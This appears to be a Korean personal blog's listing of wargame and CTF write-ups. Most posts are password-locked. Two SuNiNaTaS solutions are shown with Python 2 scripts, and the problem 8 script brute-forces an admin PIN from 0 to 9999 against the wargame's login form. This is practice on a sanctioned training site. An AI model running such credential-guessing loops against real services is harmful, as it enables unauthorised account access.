[root-me] Local File Inclusion - Double encoding

2018. 5. 22. 16:19

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[root-me] SQL injection - numeric

2018. 5. 22. 01:19

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[root-me] SQL injection - string

2018. 5. 22. 01:10

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[root-me] Local File Inclusion

2018. 5. 22. 01:03

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[root-me] SQL injection - authentication

2018. 5. 21. 21:36

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[SuNiNaTaS] 8번 문제

Solve Problem 2018. 5. 10. 16:23
반응형

이전에는 Burp의 Intruder 기능을 이용하여 풀었지만 Python 연습도 할겸 Python으로 풀었다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import urllib2
import urllib
 
url = 'http://suninatas.com/Part_one/web08/web08.asp'
 
for i in range(0,10000):
    data = {"id":"admin","pw":str(i)}
    data = urllib.urlencode(data)
    
    request = urllib2.Request(url,data)
    request.add_header('Cookie','ASPSESSIONIDASASDRCS=NGJBKGGBOGDFNGMGADBFNCPF')
 
    response = urllib2.urlopen(request)
    
    if response.read().find("Incorrect")==-1:
        print "[+] success : " +data
        break
 
    print "[-] fail : " + data
cs


반응형

'Solve Problem' 카테고리의 다른 글

[PythonChallenge] 2번  (0) 2018.09.02
[PythonChallenge] 1번  (0) 2018.09.02
[SuNiNaTaS] 7번 문제  (0) 2018.05.10
[wargame.kr] QnA  (0) 2018.05.06
[Wargame.kr] dun_worry_about_the_vase  (0) 2018.05.02
블로그 이미지

rootable

,

[SuNiNaTaS] 7번 문제

Solve Problem 2018. 5. 10. 16:09
반응형

해당 문제에 접근하면 아이유와 윤아 사진이 나오고 그 사이에 YES 버튼이 있다.

 

그 버튼을 빨리 누르면 문제가 풀릴 것 같아 파이썬으로 코드를 작성하여 문제를 해결하였다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import urllib2
import urllib
 
# GET 방식
url='http://suninatas.com/Part_one/web07/web07.asp'
request = urllib2.Request(url)
request.add_header('Cookie','ASPSESSIONIDASASDRCS=NGJBKGGBOGDFNGMGADBFNCPF')
 
response = urllib2.urlopen(request)
print response.read()
 
# POST 방
url2='http://suninatas.com/Part_one/web07/web07_1.asp'
data={"web07":"Do U Like girls?"}
data=urllib.urlencode(data)
request2 = urllib2.Request(url2,data)
request2.add_header("Cookie","ASPSESSIONIDASASDRCS=NGJBKGGBOGDFNGMGADBFNCPF")
response2 = urllib2.urlopen(request2)
print response2.read()
 
cs


반응형

'Solve Problem' 카테고리의 다른 글

[PythonChallenge] 1번  (0) 2018.09.02
[SuNiNaTaS] 8번 문제  (0) 2018.05.10
[wargame.kr] QnA  (0) 2018.05.06
[Wargame.kr] dun_worry_about_the_vase  (0) 2018.05.02
[RedTiger's Hackit] 올클리어  (0) 2018.02.03
블로그 이미지

rootable

,

[wargame.kr] QnA

2018. 5. 6. 22:10

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

공지사항

글 보관함

달력

«   2025/02   »
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28

티스토리툴바